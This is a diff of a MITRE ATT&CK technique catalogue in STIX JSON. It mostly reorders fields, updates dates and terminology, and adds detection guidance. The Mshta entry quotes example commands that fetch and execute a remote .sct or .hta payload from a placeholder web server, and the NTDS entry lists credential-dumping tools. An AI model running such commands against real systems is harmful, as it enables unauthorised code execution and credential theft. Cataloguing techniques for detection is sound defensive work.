"modified": "2020-03-31T13:54:08.535Z",
"created": "2020-02-11T19:07:12.114Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"
],
+ "x_mitre_detection": "Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
"x_mitre_data_sources": [
"File monitoring",
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
- "x_mitre_contributors": [
- "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
]
},
{
@@ -15811,29 +16387,30 @@
],
"modified": "2020-03-29T20:21:11.895Z",
"created": "2020-02-10T20:30:07.426Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process monitoring",
"Process command-line parameters",
"Windows event logs"
],
- "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Masquerading",
+ "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -15861,10 +16438,9 @@
"description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019."
}
],
- "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
- "name": "Masquerading",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -15872,7 +16448,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:26:01.837Z",
+ "modified": "2020-07-09T13:54:28.727Z",
"created": "2017-05-31T21:30:38.511Z",
"x_mitre_platforms": [
"Linux",
@@ -15881,7 +16457,7 @@
],
"x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\u201d.",
"x_mitre_defense_bypassed": [
- "Whitelisting by file name or path"
+ "Application control by file name or path"
],
"x_mitre_data_sources": [
"Process command-line parameters",
@@ -15894,7 +16470,7 @@
"Nick Carr, FireEye",
"David Lu, Tripwire",
"Felipe Esp\u00f3sito, @Pr0teus",
- "ENDGAME",
+ "Elastic",
"Bartosz Jerzman"
],
"x_mitre_version": "1.3",
@@ -15937,25 +16513,25 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:23:00.913Z",
+ "modified": "2020-06-20T22:11:45.970Z",
"created": "2020-02-10T20:43:10.239Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Application control by file name or path"
],
+ "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
- "x_mitre_defense_bypassed": [
- "Whitelisting by file name or path"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15985,7 +16561,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Modify Authentication Process",
- "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM), responsible for gathering, storing, and validating credentials. \n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. ",
+ "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows or pluggable authentication modules (PAM) on Unix-based systems, responsible for gathering, storing, and validating credentials. \n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. ",
"id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -15998,20 +16574,70 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-25T20:59:05.357Z",
+ "modified": "2020-07-13T21:23:01.762Z",
"created": "2020-02-11T19:01:56.887Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_data_sources": [
+ "File monitoring",
"Authentication logs",
"API monitoring",
"Windows Registry",
"Process monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578",
+ "url": "https://attack.mitre.org/techniques/T1578"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Modify Cloud Compute Infrastructure",
+ "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-19T14:46:00.117Z",
+ "created": "2019-08-30T18:03:05.864Z",
+ "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
]
},
{
@@ -16113,11 +16739,18 @@
],
"modified": "2020-03-29T22:52:55.930Z",
"created": "2017-05-31T21:31:23.587Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Bartosz Jerzman",
- "Travis Smith, Tripwire",
- "David Lu, Tripwire"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
],
"x_mitre_data_sources": [
"Windows Registry",
@@ -16126,19 +16759,12 @@
"Process command-line parameters",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
+ "x_mitre_contributors": [
+ "Bartosz Jerzman",
+ "Travis Smith, Tripwire",
+ "David Lu, Tripwire"
],
- "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec",
@@ -16197,7 +16823,7 @@
},
{
"id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
+ "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
"name": "Mshta",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -16257,34 +16883,43 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T21:13:44.990Z",
+ "modified": "2020-06-20T22:35:27.613Z",
"created": "2020-01-23T19:32:49.557Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Digital Certificate Validation"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank",
"Ricardo Dias"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-01-24T14:38:49.266Z",
+ "modified": "2020-06-20T22:38:14.154Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
- "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.",
+ "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.",
"name": "Msiexec",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -16312,32 +16947,23 @@
"description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-29T16:31:56.086Z",
- "created": "2020-01-24T14:38:49.266Z",
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"DLL monitoring",
"Process command-line parameters",
"Process monitoring"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
- "x_mitre_platforms": [
- "Windows"
]
},
{
@@ -16362,15 +16988,10 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-06-21T14:45:42.314Z",
+ "modified": "2020-07-14T19:43:38.181Z",
"created": "2017-05-31T21:31:15.935Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Network device logs",
@@ -16378,7 +16999,13 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+ "x_mitre_network_requirements": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c",
@@ -16419,18 +17046,18 @@
],
"modified": "2020-03-14T23:23:41.770Z",
"created": "2020-03-14T23:23:41.770Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091",
@@ -16461,7 +17088,15 @@
],
"modified": "2020-03-30T13:59:11.272Z",
"created": "2017-05-31T21:30:32.259Z",
- "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.",
"x_mitre_data_sources": [
"Packet capture",
"Netflow/Enclave netflow",
@@ -16469,15 +17104,7 @@
"Malware reverse engineering",
"Process monitoring"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e",
@@ -16515,6 +17142,15 @@
"created": "2017-05-31T21:31:01.315Z"
},
{
+ "created": "2020-02-11T18:42:35.572Z",
+ "modified": "2020-03-24T20:39:39.949Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24",
"description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n",
"name": "NTDS",
@@ -16539,21 +17175,13 @@
"source_name": "Metcalf 2015"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-24T20:39:39.949Z",
- "created": "2020-02-11T18:42:35.572Z",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
- ],
